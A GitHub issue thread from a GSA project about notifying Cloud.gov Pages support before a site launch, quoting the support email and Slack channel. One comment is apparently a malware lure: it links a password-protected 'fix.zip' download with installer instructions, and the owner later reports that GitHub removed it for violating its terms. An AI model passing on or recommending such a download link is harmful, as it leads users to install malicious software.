### ISSUE TITLE
Notify Cloud.gov Pages that we're getting ready to launch

### ISSUE THREAD

**Issue by wesley-dean-gsa** [GSA-TTS/tts.gsa.gov#174]
From the [Pages docs](https://cloud.gov/pages/documentation/before-you-launch/#launch-process):

> Notify Pages support of your intent to launch along with your repository name/url and production-ready git branch via:
> - email: pages-support@cloud.gov
> - Slack: #cg-pages

**Comment by kyy23** [comment]
Download 
https://www.mediafire.com/file/zch0v8rj7200mbm/fix.zip/file
password: changeme
In the installer menu, select "gcc."

**Comment by wesley-dean-gsa** [comment]
A comment posted on this issue was removed and reported.  GitHub support provided the following response:

> We have determined that one or more violations of GitHub’s Terms of Service have occurred and have taken appropriate action in response.

**Comment by wesley-dean-gsa** [comment]
https://gsa-tts.slack.com/archives/C04823NMA/p1725385808516419?thread_ts=1725382473.489649&cid=C04823NMA
